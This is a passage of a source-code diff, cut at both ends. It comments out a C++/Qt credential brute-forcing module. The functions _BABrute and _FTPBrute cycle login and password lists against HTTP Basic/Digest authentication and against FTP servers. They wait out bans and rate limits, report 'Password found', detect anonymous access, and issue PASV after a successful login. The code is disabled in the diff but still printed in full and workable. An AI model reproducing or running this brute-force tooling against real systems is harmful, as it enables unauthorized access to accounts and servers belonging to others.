SOCKET_ERROR) { - int errorCode = WSAGetLastError(); - if (errorCode == WSAENOTSOCK) { +// int errorCode = WSAGetLastError(); +// if (errorCode == WSAENOTSOCK) { - while (errorCode == WSAENOTSOCK) - { - if (gDebugMode) stt->doEmitionDebugFoundData("[BA][ENOTSOCK] - [" + QString(ip) + ":" + QString::number(port) + "]"); - CSSOCKET(sock); - sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); - errorCode = WSAGetLastError(); - }; - } - else { +// while (errorCode == WSAENOTSOCK) +// { +// if (gDebugMode) stt->doEmitionDebugFoundData("[BA][ENOTSOCK] - [" + QString(ip) + ":" + QString::number(port) + "]"); +// CSSOCKET(sock); +// sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); +// cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); +// errorCode = WSAGetLastError(); +// }; +// } +// else { - CSSOCKET(sock); +// CSSOCKET(sock); - if (errorCode != WSAETIMEDOUT) - { - stt->doEmitionRedFoundData("[BA] Cannot connect to " + QString(ip) + "[" + QString::number(errorCode) + "]"); - }; +// if (errorCode != WSAETIMEDOUT) +// { +// stt->doEmitionRedFoundData("[BA] Cannot connect to " + QString(ip) + "[" + QString::number(errorCode) + "]"); +// }; - isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; - }; - } - else { +// isActive = 0; +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// }; +// } +// else { - int x = 1; - Activity += strlen(request); +// int x = 1; +// Activity += strlen(request); - if (send(sock, request, strlen(request), 0) != SOCKET_ERROR) - { - if (MapWidgetOpened) stt->doEmitionAddOutData(QString(request)); - dataSz = 0; - ZeroMemory(recvBuff2, sizeof(recvBuff2)); - ZeroMemory(recvBuff, sizeof(recvBuff)); - while (x > 0 && dataSz < 3384) - { - ZeroMemory(recvBuff2, sizeof(recvBuff2)); - x = recvWT(sock, recvBuff2, sizeof(recvBuff2), gTimeOut + 5, &bTO); +// if (send(sock, request, strlen(request), 0) != SOCKET_ERROR) +// { +// if (MapWidgetOpened) stt->doEmitionAddOutData(QString(request)); +// dataSz = 0; +// ZeroMemory(recvBuff2, sizeof(recvBuff2)); +// ZeroMemory(recvBuff, sizeof(recvBuff)); +// while (x > 0 && dataSz < 3384) +// { +// ZeroMemory(recvBuff2, sizeof(recvBuff2)); +// x = recvWT(sock, recvBuff2, sizeof(recvBuff2), gTimeOut + 5, &bTO); - dataSz += x; - Activity += x; - strncat(recvBuff, recvBuff2, x); - }; - if (BALogSwitched) stt->doEmitionBAData("Checked BA: " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(curLogin) + ":" + QString(curPass) + "; - Progress: (" + QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)"); - } - else - { - stt->doEmitionRedFoundData("[BA] Send error! [" + QString(ip) + "]"); +// dataSz += x; +// Activity += x; +// strncat(recvBuff, recvBuff2, x); +// }; +// if (BALogSwitched) stt->doEmitionBAData("Checked BA: " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(curLogin) + ":" + QString(curPass) + "; - Progress: (" + QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)"); +// } +// else +// { +// stt->doEmitionRedFoundData("[BA] Send error! [" + QString(ip) + "]"); - CSSOCKET(sock); - isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; - } - }; - CSSOCKET(sock); - }; +// CSSOCKET(sock); +// isActive = 0; +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// } +// }; +// CSSOCKET(sock); +// }; - if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff)); +// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff)); - if (dataSz == 0) - { - stt->doEmitionBAData("[BA] No reply from: " + QString(ip) + "; Repeating..."); - --j; - continue; - } - else - { - ++passCounter; - }; +// if (dataSz == 0) +// { +// stt->doEmitionBAData("[BA] No reply from: " + QString(ip) + "; Repeating..."); +// --j; +// continue; +// } +// else +// { +// ++passCounter; +// }; - if (strcmp(method, "[DIGEST]") == 0) - { - ZeroMemory(localBuff, sizeof(localBuff)); - strcpy(localBuff, recvBuff); - }; - if (strstri(recvBuff, "http/1.1 401") != NULL - || strstri(recvBuff, "http/1.0 401") != NULL - || (strstri(recvBuff, "200 ok") != NULL - && strstri(recvBuff, "401") != NULL - && strstri(recvBuff, "Unauthorized") != NULL) - ) - { - Sleep(200); - } else - //if(strstri(recvBuff, "http/1.1 401") == NULL - // || strstri(recvBuff, "http/1.0 401") == NULL - // ) - //{ - // if ((strstri(recvBuff, "200 ok") != NULL - // || strstri(recvBuff, "http/1.0 200") != NULL - // || strstri(recvBuff, "http/1.1 200") != NULL - // ) - // && strstr(headerMsg, "неправильны") == NULL - // && strstr(headerMsg, "Неправильны") == NULL - // && strstr(headerMsg, "Неправильны") == NULL) - // { - // } - // stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")"); - // Sleep(200); - // ///dummy/// - //} - if(strstri(recvBuff, "503 service unavailable") != NULL - || strstri(recvBuff, "http/1.1 503") != NULL - || strstri(recvBuff, "http/1.0 503") != NULL - || strstr(recvBuff, "400 BAD_REQUEST") != NULL - || strstri(recvBuff, "400 bad request") != NULL - || strstr(recvBuff, "403 Forbidden") != NULL - ) - { - stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")"); +// if (strcmp(method, "[DIGEST]") == 0) +// { +// ZeroMemory(localBuff, sizeof(localBuff)); +// strcpy(localBuff, recvBuff); +// }; +// if (strstri(recvBuff, "http/1.1 401") != NULL +// || strstri(recvBuff, "http/1.0 401") != NULL +// || (strstri(recvBuff, "200 ok") != NULL +// && strstri(recvBuff, "401") != NULL +// && strstri(recvBuff, "Unauthorized") != NULL) +// ) +// { +// Sleep(200); +// } else +// //if(strstri(recvBuff, "http/1.1 401") == NULL +// // || strstri(recvBuff, "http/1.0 401") == NULL +// // ) +// //{ +// // if ((strstri(recvBuff, "200 ok") != NULL +// // || strstri(recvBuff, "http/1.0 200") != NULL +// // || strstri(recvBuff, "http/1.1 200") != NULL +// // ) +// // && strstr(headerMsg, "неправильны") == NULL +// // && strstr(headerMsg, "Неправильны") == NULL +// // && strstr(headerMsg, "Неправильны") == NULL) +// // { +// // } +// // stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")"); +// // Sleep(200); +// // ///dummy/// +// //} +// if(strstri(recvBuff, "503 service unavailable") != NULL +// || strstri(recvBuff, "http/1.1 503") != NULL +// || strstri(recvBuff, "http/1.0 503") != NULL +// || strstr(recvBuff, "400 BAD_REQUEST") != NULL +// || strstri(recvBuff, "400 bad request") != NULL +// || strstr(recvBuff, "403 Forbidden") != NULL +// ) +// { +// stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")"); - if(j > 0) --j; - Sleep(30000); - } - else if((strstri(recvBuff, "http/1.1 404") != NULL - || strstri(recvBuff, "http/1.0 404") != NULL - ) - && strstri(recvBuff, "Authorization required") == NULL - ) - { - if(HTMLDebugMode) _DebugWriteHTMLToFile(request, recvBuff); +// if(j > 0) --j; +// Sleep(30000); +// } +// else if((strstri(recvBuff, "http/1.1 404") != NULL +// || strstri(recvBuff, "http/1.0 404") != NULL +// ) +// && strstri(recvBuff, "Authorization required") == NULL +// ) +// { +// if(HTMLDebugMode) _DebugWriteHTMLToFile(request, recvBuff); - if (i > 0 || j > 0) stt->doEmitionYellowFoundData("[?] Unexpected 404. Check " + QString(ip) + ":" + QString::number(port) + " l/p:" + QString(tPass) + " manually. (" + QString(ip) + ":" + QString::number(port) + QString(path) + ")"); - else stt->doEmitionRedFoundData("[-] 404 - Wrong path detected. (" + QString(ip) + ":" + QString::number(port) + QString(path) + ")"); +// if (i > 0 || j > 0) stt->doEmitionYellowFoundData("[?] Unexpected 404. Check " + QString(ip) + ":" + QString::number(port) + " l/p:" + QString(tPass) + " manually. (" + QString(ip) + ":" + QString::number(port) + QString(path) + ")"); +// else stt->doEmitionRedFoundData("[-] 404 - Wrong path detected. (" + QString(ip) + ":" + QString::number(port) + QString(path) + ")"); - isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; - } - else if ((strstri(recvBuff, "200 ok") != NULL - || strstri(recvBuff, "http/1.0 200") != NULL - || strstri(recvBuff, "http/1.1 200") != NULL - ) - && strstri(recvBuff, "http/1.1 401 ") == NULL - && strstri(recvBuff, "http/1.0 401 ") == NULL - && strstri(recvBuff, "401") == NULL - && strstri(recvBuff, "Unauthorized") == NULL - && strstri(recvBuff, "неправильны") == NULL - && strstri(recvBuff, "Неправильны") == NULL - && dataSz > 13 - ) - { - if(strstri(recvBuff, "access is denied") == NULL - && strstri(recvBuff, "iisstart") == NULL - && strstri(recvBuff, "Location:") == NULL - && strstri(recvBuff, "access forbidden") == NULL - ) - { - ZeroMemory(pass, sizeof(pass)); - strcpy(pass, ip); - strcat(pass, " - Password found: "); - strcat(pass, tPass); - isActive = 0; - stt->doEmition_BAGreenData("[+] " + QString(pass)); - strcpy(lps.login, curLogin); - strcpy(lps.pass, curPass); - return lps; - }; - } - else - { - if (strstri(recvBuff, "неправильны") == NULL - && strstri(recvBuff, "Неправильны") == NULL) - { - ZeroMemory(pass, sizeof(pass)); - sprintf(pass, "%s - Password found: %s", ip, tPass); - char *pt1 = strstr(recvBuff, " "); - if(pt1 != NULL) - { - char *pt2 = strstr(pt1 + 1, " "); - if(pt2 != NULL) - { - int sz = pt2 - pt1 - 1; - char tempHeaderCode[16] = {0}; - strncpy(tempHeaderCode, pt1 + 1, sz); +// isActive = 0; +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// } +// else if ((strstri(recvBuff, "200 ok") != NULL +// || strstri(recvBuff, "http/1.0 200") != NULL +// || strstri(recvBuff, "http/1.1 200") != NULL +// ) +// && strstri(recvBuff, "http/1.1 401 ") == NULL +// && strstri(recvBuff, "http/1.0 401 ") == NULL +// && strstri(recvBuff, "401") == NULL +// && strstri(recvBuff, "Unauthorized") == NULL +// && strstri(recvBuff, "неправильны") == NULL +// && strstri(recvBuff, "Неправильны") == NULL +// && dataSz > 13 +// ) +// { +// if(strstri(recvBuff, "access is denied") == NULL +// && strstri(recvBuff, "iisstart") == NULL +// && strstri(recvBuff, "Location:") == NULL +// && strstri(recvBuff, "access forbidden") == NULL +// ) +// { +// ZeroMemory(pass, sizeof(pass)); +// strcpy(pass, ip); +// strcat(pass, " - Password found: "); +// strcat(pass, tPass); +// isActive = 0; +// stt->doEmition_BAGreenData("[+] " + QString(pass)); +// strcpy(lps.login, curLogin); +// strcpy(lps.pass, curPass); +// return lps; +// }; +// } +// else +// { +// if (strstri(recvBuff, "неправильны") == NULL +// && strstri(recvBuff, "Неправильны") == NULL) +// { +// ZeroMemory(pass, sizeof(pass)); +// sprintf(pass, "%s - Password found: %s", ip, tPass); +// char *pt1 = strstr(recvBuff, " "); +// if(pt1 != NULL) +// { +// char *pt2 = strstr(pt1 + 1, " "); +// if(pt2 != NULL) +// { +// int sz = pt2 - pt1 - 1; +// char tempHeaderCode[16] = {0}; +// strncpy(tempHeaderCode, pt1 + 1, sz); - if(strcmp(tempHeaderCode, "302") == 0 && strcmp(tempHeaderCode, "200") == 0) stt->doEmitionYellowFoundData("[+] No/unexpected HTTP header detected (" + QString(tempHeaderCode) + ") IP: " + QString(ip) + ":" + QString::number(port) + ""); - strcpy(lps.login, curLogin); - strcpy(lps.pass, curPass); - return lps; - }; - }; - stt->doEmitionYellowFoundData("[+] No/unexpected HTTP header detected (?) IP: " + QString(ip) + ":" + QString::number(port) + ""); - strcpy(lps.login, curLogin); - strcpy(lps.pass, curPass); - isActive = 0; - return lps; - } - else Sleep(200); - }; +// if(strcmp(tempHeaderCode, "302") == 0 && strcmp(tempHeaderCode, "200") == 0) stt->doEmitionYellowFoundData("[+] No/unexpected HTTP header detected (" + QString(tempHeaderCode) + ") IP: " + QString(ip) + ":" + QString::number(port) + ""); +// strcpy(lps.login, curLogin); +// strcpy(lps.pass, curPass); +// return lps; +// }; +// }; +// stt->doEmitionYellowFoundData("[+] No/unexpected HTTP header detected (?) IP: " + QString(ip) + ":" + QString::number(port) + ""); +// strcpy(lps.login, curLogin); +// strcpy(lps.pass, curPass); +// isActive = 0; +// return lps; +// } +// else Sleep(200); +// }; - if(strstr(recvBuff, "Set-Cookie:") != NULL) - { - ZeroMemory(cookie, COOKIE_MAX_SIZE); -// strncpy(cookie, _getAttribute(recvBuff, "Set-Cookie:"), COOKIE_MAX_SIZE); - cookieLen = strlen(cookie); - }; - }; - }; +// if(strstr(recvBuff, "Set-Cookie:") != NULL) +// { +// ZeroMemory(cookie, COOKIE_MAX_SIZE); +//// strncpy(cookie, _getAttribute(recvBuff, "Set-Cookie:"), COOKIE_MAX_SIZE); +// cookieLen = strlen(cookie); +// }; +// }; +// }; - isActive = 0; +// isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; -} +// strcpy(lps.login, "UNKNOWN"); +// return lps; +//} -lopaStr _BALobby(char *cookie, char *ip, int port, char *path, char *method) -{ - while(BrutingThrds >= gMaxBrutingThreads) Sleep(700); +//lopaStr _BALobby(char *cookie, char *ip, int port, char *path, char *method) +//{ +// while(BrutingThrds >= gMaxBrutingThreads) Sleep(700); - BruteUtils::BConInc(); - lopaStr res = _BABrute(cookie, ip, port, path, method); - BruteUtils::BConDec(); +// BruteUtils::BConInc(); +// lopaStr res = _BABrute(cookie, ip, port, path, method); +// BruteUtils::BConDec(); - return res; -} +// return res; +//} -lopaStr _FTPBrute(char *ip, int port, PathStr *ps) -{ - lopaStr lps; - ZeroMemory(lps.login, sizeof(lps.login)); - ZeroMemory(lps.pass, sizeof(lps.pass)); - ZeroMemory(lps.other, sizeof(lps.other)); +//lopaStr _FTPBrute(char *ip, int port, PathStr *ps) +//{ +// lopaStr lps; +// ZeroMemory(lps.login, sizeof(lps.login)); +// ZeroMemory(lps.pass, sizeof(lps.pass)); +// ZeroMemory(lps.other, sizeof(lps.other)); - char recvBuff[1024] = {0}, request[64] = {0}; - sockaddr_in sockAddr; - sockAddr.sin_family = AF_INET; - sockAddr.sin_port = htons(port); - HOSTENT *host; +// char recvBuff[1024] = {0}, request[64] = {0}; +// sockaddr_in sockAddr; +// sockAddr.sin_family = AF_INET; +// sockAddr.sin_port = htons(port); +// HOSTENT *host; -#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) - if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip); - else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; - else - { - strcpy(lps.login, "UNKNOWN"); - return lps; - }; -#else - if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip); - else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; - else - { - strcpy(lps.login, "UNKNOWN"); - return lps; - }; -#endif +//#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) +// if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip); +// else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; +// else +// { +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// }; +//#else +// if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip); +// else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; +// else +// { +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// }; +//#endif - bool breakPassLoop = 0; - int passCounter = 1; - int bTO; - int x = 0; - int connectionResult, closedSocket = 1, loginFailedFlag = 0; +// bool breakPassLoop = 0; +// int passCounter = 1; +// int bTO; +// int x = 0; +// int connectionResult, closedSocket = 1, loginFailedFlag = 0; - SOCKET sockFTP; - for(int i = 0; i < MaxLogin; ++i) - { - if(globalScanFlag == false) break; - if(strlen(loginLst[i]) <= 1) continue; +// SOCKET sockFTP; +// for(int i = 0; i < MaxLogin; ++i) +// { +// if(globalScanFlag == false) break; +// if(strlen(loginLst[i]) <= 1) continue; - for(int j = 0; j < MaxPass; ++j) - { - if(globalScanFlag == false) break; - if(strlen(passLst[j]) <= 1) continue; +// for(int j = 0; j < MaxPass; ++j) +// { +// if(globalScanFlag == false) break; +// if(strlen(passLst[j]) <= 1) continue; - if(closedSocket) - { - closedSocket = 0; - sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); - connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); +// if(closedSocket) +// { +// closedSocket = 0; +// sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); +// connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); - while(WSAGetLastError() == WSAENOTSOCK) - { - if(gDebugMode) stt->doEmitionDebugFoundData("[FTP][ENOTSOCK] [" + QString(ip) + ":" + QString::number(port) + "]"); - CSSOCKET(sockFTP); - sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); - connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); - }; - loginFailedFlag = 0; - }; +// while(WSAGetLastError() == WSAENOTSOCK) +// { +// if(gDebugMode) stt->doEmitionDebugFoundData("[FTP][ENOTSOCK] [" + QString(ip) + ":" + QString::number(port) + "]"); +// CSSOCKET(sockFTP); +// sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); +// connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); +// }; +// loginFailedFlag = 0; +// }; - isActive = 1; +// if(connectionResult != SOCKET_ERROR) +// { +// x = 0; +// while (true) +// { +// Sleep(100); +// ZeroMemory(recvBuff, 1024); +// x = recvWT(sockFTP, recvBuff, 1024, gTimeOut + 5, &bTO); +// if(x <= 0) break; +// if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff)); - if(connectionResult != SOCKET_ERROR) - { - x = 0; - while (true) - { - Sleep(100); - ZeroMemory(recvBuff, 1024); - x = recvWT(sockFTP, recvBuff, 1024, gTimeOut + 5, &bTO); - if(x <= 0) break; - if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff)); +// Activity += x; +// closedSocket = 0; +// if(strstr(recvBuff, "451 The parameter is incorrect") != NULL) +// { +// CSSOCKET(sockFTP); +// stt->doEmition_BARedData("[*] Unknown protocol (451 Error) - " + QString(ip)); +// strcpy(lps.other, "Unknown protocol (451 Error)"); +// return lps; +// }; - Activity += x; - closedSocket = 0; - if(strstr(recvBuff, "451 The parameter is incorrect") != NULL) - { - CSSOCKET(sockFTP); - isActive = 0; - stt->doEmition_BARedData("[*] Unknown protocol (451 Error) - " + QString(ip)); - strcpy(lps.other, "Unknown protocol (451 Error)"); - return lps; - }; +// if(strstri(recvBuff, "only anonymous") != NULL) +// { +// CSSOCKET(sockFTP); +// stt->doEmition_BAGreenData("[*] Anonymous access detected - " + QString(ip)); - if(strstri(recvBuff, "only anonymous") != NULL) - { - CSSOCKET(sockFTP); - isActive = 0; - stt->doEmition_BAGreenData("[*] Anonymous access detected - " + QString(ip)); +// strcpy(lps.login, "anonymous"); +// strcpy(lps.pass, "1"); +// return lps; +// }; - strcpy(lps.login, "anonymous"); - strcpy(lps.pass, "1"); - return lps; - }; +// if(strstr(recvBuff, "550 no connections allowed") != NULL +// || strstr(recvBuff, "550-") != NULL +// ) +// { +// CSSOCKET(sockFTP); - if(strstr(recvBuff, "550 no connections allowed") != NULL - || strstr(recvBuff, "550-") != NULL - ) - { - CSSOCKET(sockFTP); +// stt->doEmition_BARedData("[-] 550 (No connections allowed) - Ban detected. Dropping " + QString(ip)); - isActive = 0; +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// }; +// if(strstr(recvBuff, "no such command")) +// { +// CSSOCKET(sockFTP); - stt->doEmition_BARedData("[-] 550 (No connections allowed) - Ban detected. Dropping " + QString(ip)); +// stt->doEmition_BARedData("[-] 500 (Sorry, no such command) " + QString(ip)); +// strcpy(lps.other, "[500 Sorry, no such command]"); +// return lps; +// }; +// if((strstr(recvBuff, "500 ") != NULL +// || strstr(recvBuff, "500-") != NULL +// ) +// && strstri(recvBuff, "500 oops") == NULL +// ) +// { +// j = 0; +// break; +// }; - strcpy(lps.login, "UNKNOWN"); - return lps; - }; +// if(strstr(recvBuff, "421 ") != NULL || strstr(recvBuff, "421-") != NULL) +// { +// break; +// }; - if(strstr(recvBuff, "no such command")) - { - CSSOCKET(sockFTP); +// if(strstri(recvBuff, "530 Sorry, no ANONYMOUS access allowed.") != NULL) +// { +// ++i; +// break; +// }; - isActive = 0; - stt->doEmition_BARedData("[-] 500 (Sorry, no such command) " + QString(ip)); - strcpy(lps.other, "[500 Sorry, no such command]"); - return lps; - }; +// if(globalScanFlag == false) break; - if((strstr(recvBuff, "500 ") != NULL - || strstr(recvBuff, "500-") != NULL - ) - && strstri(recvBuff, "500 oops") == NULL - ) - { - j = 0; - break; - }; +// if((strstr(recvBuff, "530 Sorry") != NULL) +// || (strstr(recvBuff, "530") != NULL && strstr(recvBuff, "maximum") != NULL) +// || strstr(recvBuff, "exceeded") != NULL +// || strstr(recvBuff, "421 Too many") != NULL +// || strstr(recvBuff, "from this IP") != NULL +// || strstr(recvBuff, "from your IP") != NULL) +// { +// stt->doEmition_BARedData("[-] FTP: 530 - Ban detected? Waiting 30sec (" + QString(ip) + ")"); +// if(j > 0) --j; +// ZeroMemory(recvBuff, sizeof(recvBuff)); +// Sleep(30000); +// break; +// } +// else if( (strstr(recvBuff, "220 ") != NULL || loginFailedFlag == 1 || strstr(recvBuff, "503") != NULL || strstr(recvBuff, "server ready") != NULL )) +// { +// strcpy(request, "USER "); +// if(strlen(loginLst[i]) != 0) strcat(request, loginLst[i]); +// else +// { +// loginFailedFlag = 1; +// break; +// }; +// strcat(request, "\r\n"); +// if(send(sockFTP, request, strlen(request), 0) != SOCKET_ERROR) +// { +// if(MapWidgetOpened) stt->doEmitionAddOutData(QString(request)); +// Activity += strlen(request); - if(strstr(recvBuff, "421 ") != NULL || strstr(recvBuff, "421-") != NULL) - { - break; - }; +// ZeroMemory(request, sizeof(request)); +// } +// else +// { +// stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port)); +// }; +// } +// else if(strstr(recvBuff, "530") != NULL +// || strstr(recvBuff, "Login incorrect") != NULL +// || strstri(recvBuff, "500 oops") != NULL +// ) +// { +// loginFailedFlag = 1; +// break; +// } +// else if(strstr(recvBuff, "331") != NULL) +// { +// if(strstr(recvBuff, "Non-anonymous sessions must use encryption") != NULL +// || strstr(recvBuff, "Rejected--secure connection required") != NULL +// ) +// { +// stt->doEmition_BARedData("FTP server (" + QString(ip) + ") appears to require SSL for specified user: " + QString(loginLst[i])); +// CSSOCKET(sockFTP); +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// } +// else if(strstri(recvBuff, "permission denied") == NULL) +// { +// strcpy(request, "PASS "); +// if(strlen(passLst[j]) != 0) strcat(request, passLst[j]); +// else +// { +// loginFailedFlag = 1; +// break; +// }; +// strcat(request, "\r\n"); +// if(send(sockFTP, request, strlen(request), 0) != SOCKET_ERROR) +// { +// if(MapWidgetOpened) stt->doEmitionAddOutData(QString(request)); - if(strstri(recvBuff, "530 Sorry, no ANONYMOUS access allowed.") != NULL) - { - ++i; - break; - }; +// Activity += strlen(request); +// ZeroMemory(request, sizeof(request)); - if(globalScanFlag == false) break; +// if(BALogSwitched) stt->doEmitionBAData("Probing FTP: " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" + QString::number((passCounter/(double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)"); +// ++passCounter; +// } +// else +// { +// stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port)); +// }; +// } +// else +// { +// breakPassLoop = 1; +// stt->doEmition_BARedData("Permission denied for login - " + QString(ip) + ":" + QString::number(port) + "; login: " + QString(loginLst[i])); +// break; +// }; +// } +// else if(strstr(recvBuff, "230") != NULL) +// { +// char pass[128] = {0}; - if((strstr(recvBuff, "530 Sorry") != NULL) - || (strstr(recvBuff, "530") != NULL && strstr(recvBuff, "maximum") != NULL) - || strstr(recvBuff, "exceeded") != NULL - || strstr(recvBuff, "421 Too many") != NULL - || strstr(recvBuff, "from this IP") != NULL - || strstr(recvBuff, "from your IP") != NULL) - { - stt->doEmition_BARedData("[-] FTP: 530 - Ban detected? Waiting 30sec (" + QString(ip) + ")"); - if(j > 0) --j; - ZeroMemory(recvBuff, sizeof(recvBuff)); - Sleep(30000); - break; - } - else if( (strstr(recvBuff, "220 ") != NULL || loginFailedFlag == 1 || strstr(recvBuff, "503") != NULL || strstr(recvBuff, "server ready") != NULL )) - { - strcpy(request, "USER "); - if(strlen(loginLst[i]) != 0) strcat(request, loginLst[i]); - else - { - loginFailedFlag = 1; - break; - }; - strcat(request, "\r\n"); - if(send(sockFTP, request, strlen(request), 0) != SOCKET_ERROR) - { - if(MapWidgetOpened) stt->doEmitionAddOutData(QString(request)); - Activity += strlen(request); +// strcpy(pass, ip); +// strcat(pass, " - FTP Password found: "); +// strcat(pass, loginLst[i]); +// strcat(pass, ":"); +// strcat(pass, passLst[j]); - ZeroMemory(request, sizeof(request)); - } - else - { - stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port)); - }; - } - else if(strstr(recvBuff, "530") != NULL - || strstr(recvBuff, "Login incorrect") != NULL - || strstri(recvBuff, "500 oops") != NULL - ) - { - loginFailedFlag = 1; - break; - } - else if(strstr(recvBuff, "331") != NULL) - { - if(strstr(recvBuff, "Non-anonymous sessions must use encryption") != NULL - || strstr(recvBuff, "Rejected--secure connection required") != NULL - ) - { - stt->doEmition_BARedData("FTP server (" + QString(ip) + ") appears to require SSL for specified user: " + QString(loginLst[i])); - CSSOCKET(sockFTP); +// char recvBuff2[2048] = {0}; +// if(send(sockFTP, "PASV\r\n", 6, 0) != SOCKET_ERROR) +// { +// int x = 1, xx = 0; +// while(x != 0) +// { +// ZeroMemory(recvBuff, sizeof(recvBuff)); +// x = recvWT(sockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 5, &bTO); +// xx += x; +// if(xx < 1536) strncat(recvBuff2, recvBuff, x); +// else break; +// }; - isActive = 0; +// if(strstri(recvBuff2, "unknown command") != NULL || strstri(recvBuff2, "invalid command") != NULL) +// { +// stt->doEmitionYellowFoundData("[-] PASV failed. Router detected?"); +// CSSOCKET(sockFTP); +// strcpy(lps.login, loginLst[i]); +// strcpy(lps.pass, passLst[j]); +// strcpy(lps.other, "ROUTER"); +// return lps; +// }; - strcpy(lps.login, "UNKNOWN"); - return lps; - } - else if(strstri(recvBuff, "permission denied") == NULL) - { - strcpy(request, "PASS "); - if(strlen(passLst[j]) != 0) strcat(request, passLst[j]); - else - { - loginFailedFlag = 1; - break; - }; - strcat(request, "\r\n"); - if(send(sockFTP, request, strlen(request), 0) != SOCKET_ERROR) - { - if(MapWidgetOpened) stt->doEmitionAddOutData(QString(request)); +// char *ptr0 = strstr(recvBuff2, "227 "); - Activity += strlen(request); - ZeroMemory(request, sizeof(request)); +// if( ptr0 != NULL ) +// { +// if(strstr(ptr0, "(") != NULL) +// { +// char pasvData[32] = {0}; +// char *ptr1 = strstr(ptr0, "("); +// char *ptr2 = strstr(ptr0, ")"); +// int sz = ptr2 - ptr1 - 1; +// strncpy(pasvData, ptr1 + 1, sz); +// char *ptr3 = strstr(pasvData, ","); +// ptr3 = strstr(ptr3 + 1, ","); +// ptr3 = strstr(ptr3 + 1, ","); +// ptr3 = strstr(ptr3 + 1, ","); - if(BALogSwitched) stt->doEmitionBAData("Probing FTP: " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" + QString::number((passCounter/(double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)"); - ++passCounter; - } - else - { - stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port)); - }; - } - else - { - breakPassLoop = 1; - stt->doEmition_BARedData("Permission denied for login - " + QString(ip) + ":" + QString::number(port) + "; login: " + QString(loginLst[i])); - break; - }; - } - else if(strstr(recvBuff, "230") != NULL) - { - char pass[128] = {0}; +// if(ptr3 != NULL) +// { +// char *ptrP2 = strstr(ptr3 + 1, ","); +// char p1c[8] = {0}; +// sz = ptrP2 - ptr3 - 1; +// strncpy(p1c, ptr3 + 1, sz); +// int p1 = atoi(p1c); +// int p2 = atoi(ptrP2 + 1); +// port = p1 * 256 + p2; - strcpy(pass, ip); - strcat(pass, " - FTP Password found: "); - strcat(pass, loginLst[i]); - strcat(pass, ":"); - strcat(pass, passLst[j]); +// sockAddr.sin_port = htons(port); +// SOCKET newSockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); +// connectionResult = connect(newSockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); - char recvBuff2[2048] = {0}; - if(send(sockFTP, "PASV\r\n", 6, 0) != 